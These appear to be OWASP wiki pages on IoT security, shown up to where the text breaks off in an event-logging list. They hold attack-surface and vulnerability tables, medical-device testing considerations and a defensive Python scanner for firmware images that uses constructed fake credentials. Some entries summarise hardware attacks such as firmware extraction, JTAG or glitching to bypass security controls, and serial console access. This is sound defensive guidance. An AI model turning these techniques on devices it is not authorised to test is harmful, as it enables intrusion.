[[File:2014 2018Mapping.png|center|frameless|746x746px]]<br />
<br />
For additional mappings, please visit the following link: https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Top 10 Mapping Project? ==<br />
<br />
The OWASP IoT Mapping Project is intended to provide a mapping of the OWASP IoT Top 10 2018 to industry publications and sister projects. The goal is to provide resources that enable practical uses for the OWASP IoT Top 10. As with all Top 10 lists, it should be used as a first step and expanded upon according to the applicable IoT ecosystem.<br />
<br />
Mappings include the following:<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/owasp-iot-top-10-2014 OWASP IoT Top 10 2014]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/gsma-iot-security-assessment-checklist GSMA IoT Security Assessment Checklist]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/code-of-practice Code of Practice (UK Government)]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/enisa-baseline-security-recommendations-for-iot ENISA Baseline Security Recommendations for IoT]<br />
<br />
and more...<br />
<br />
== GitBook ==<br />
Mappings are hosted on GitBook using the following link https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/<br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
|}<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Check for old software versions and the known attacks against them (Heartbleed, Shellshock, old PHP versions, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of a single static key for both encryption and decryption<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-Wave, XBee, Zigbee, Bluetooth, LoRa)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Disclosure of authentication/authorization values (session key, token, cookie, etc.)<br />
* Reuse of session keys, tokens, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damage (Physical)<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to trivial values such as '1234' or '123456'<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented, but it is improperly configured or not kept up to date (e.g. still using SSL v2)<br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world-writable, potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* The service can be attacked in a way that makes that service, or the entire device, unavailable<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting an OTA update<br />
* Downloading from the manufacturer's web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI flash / eMMC chip and reading it in an adapter<br />
|<br />
* Firmware contains a lot of useful information, such as the source code and binaries of running services, pre-set passwords, SSH keys, etc.<br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With a JTAG adapter and gdb, the execution of the firmware on the device can be modified to bypass almost all software-based security controls.<br />
* Side channel attacks can likewise modify the execution flow or be used to leak sensitive information from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface, full console access to the device can be obtained<br />
* Security measures usually include custom bootloaders that prevent an attacker from entering single-user mode, but these can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out-of-date versions of BusyBox, OpenSSL, SSH, web servers, etc.<br />
|-<br />
<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of a single static key for both encryption and decryption<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-Wave, XBee, Zigbee, Bluetooth, LoRa)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Disclosure of authentication/authorization values (session key, token, cookie, etc.)<br />
* Reuse of session keys, tokens, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
* Failure state analysis<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to get an understanding of the complexity of a modern medical environment<br />
* Allows people to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
|-<br />
|}<br />
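Several of the firmware findings and manufacturer recommendations above can be checked automatically on an extracted root filesystem before an image ships. The following Python script is an added example, not code from the OWASP project or from any of the tools listed: it flags extra uid-0 accounts, password hashes that ship in /etc/shadow, PEM keys and certificates, and a certificate reused across two images. The two root filesystems, their file contents, and the `scan_rootfs`, `shared_artifacts` and `run_demo` names are constructed for the illustration; certificate expiry is not checked.<br />

```python
import hashlib
import os
import tempfile
from collections import defaultdict

# PEM markers to look for; "PRIVATE KEY-----" matches RSA, EC and PKCS#8 headers alike.
PEM_MARKERS = {
    "private key in image": b"PRIVATE KEY-----",
    "certificate in image": b"-----BEGIN CERTIFICATE-----",
}
LOCKED_HASHES = {"", "*", "!", "!!"}   # shadow hash fields that mean "no usable password"


def _read(path, limit=1 << 20):
    """Read up to `limit` bytes so a large blob in the image does not stall the scan."""
    with open(path, "rb") as fh:
        return fh.read(limit)


def scan_rootfs(root):
    """Walk one extracted root filesystem; return a list of (finding, path, detail)."""
    findings = []
    passwd, shadow = (os.path.join(root, "etc", name) for name in ("passwd", "shadow"))
    if os.path.isfile(passwd):
        for line in _read(passwd).decode(errors="replace").splitlines():
            f = line.split(":")
            if len(f) >= 3 and f[2] == "0" and f[0] != "root":   # a second uid-0 login
                findings.append(("backdoor account (uid 0)", passwd, f[0]))
    if os.path.isfile(shadow):
        for line in _read(shadow).decode(errors="replace").splitlines():
            f = line.split(":")
            if len(f) >= 2 and f[1] not in LOCKED_HASHES:        # a password ships in the image
                findings.append(("hardcoded password hash", shadow, f[0]))
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            if os.path.islink(path) or not os.path.isfile(path):
                continue
            data = _read(path)
            for finding, marker in PEM_MARKERS.items():
                if marker in data:
                    # a content digest lets the same key/cert be spotted across images
                    findings.append((finding, path, hashlib.sha256(data).hexdigest()[:16]))
    return findings


def shared_artifacts(reports):
    """Given {image: findings}, return {digest: [images]} for keys/certs present in more than one image."""
    seen = defaultdict(set)
    for image, findings in reports.items():
        for finding, _, detail in findings:
            if finding in PEM_MARKERS:
                seen[detail].add(image)
    return {digest: sorted(images) for digest, images in seen.items() if len(images) > 1}


# Constructed stand-ins for a device certificate and key (not real credentials).
CONSTRUCTED_CERT = b"-----BEGIN CERTIFICATE-----\nQ09OU1RSVUNURUQgQ0VSVA==\n-----END CERTIFICATE-----\n"
CONSTRUCTED_KEY = b"-----BEGIN RSA PRIVATE KEY-----\nQ09OU1RSVUNURUQgS0VZ\n-----END RSA PRIVATE KEY-----\n"


def build_constructed_images(base):
    """Write two fake extracted root filesystems under `base` that share one certificate."""
    layout = {
        "model_a": {
            "etc/passwd": b"root:x:0:0:root:/root:/bin/sh\nsupport:x:0:0::/:/bin/sh\n",
            "etc/shadow": b"root:$1$constructed$hash:0:0:99999:7:::\nsupport:!:0:0:99999:7:::\n",
            "etc/ssl/device.crt": CONSTRUCTED_CERT,
            "etc/ssl/device.key": CONSTRUCTED_KEY,
        },
        "model_b": {
            "etc/passwd": b"root:x:0:0:root:/root:/bin/sh\n",
            "etc/shadow": b"root:*:0:0:99999:7:::\n",
            "etc/ssl/device.crt": CONSTRUCTED_CERT,
        },
    }
    for image, files in layout.items():
        for rel, content in files.items():
            path = os.path.join(base, image, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as fh:
                fh.write(content)
    return [os.path.join(base, image) for image in layout]


def run_demo():
    """Build the constructed images in a temp dir, scan them, and return (reports, shared)."""
    with tempfile.TemporaryDirectory() as base:
        reports = {os.path.basename(p): scan_rootfs(p) for p in build_constructed_images(base)}
        return reports, shared_artifacts(reports)


if __name__ == "__main__":
    reports, shared = run_demo()
    for image, findings in reports.items():
        for finding, path, detail in findings:
            print(f"{image}: {finding} ({detail}) at {path}")
    for digest, images in shared.items():
        print(f"certificate/key {digest} is shared by {', '.join(images)}")
```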
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file system for sensitive or interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events ==<br />
<br />
This is a working draft of the recommended minimum IoT Device logging events. This includes many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA type devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
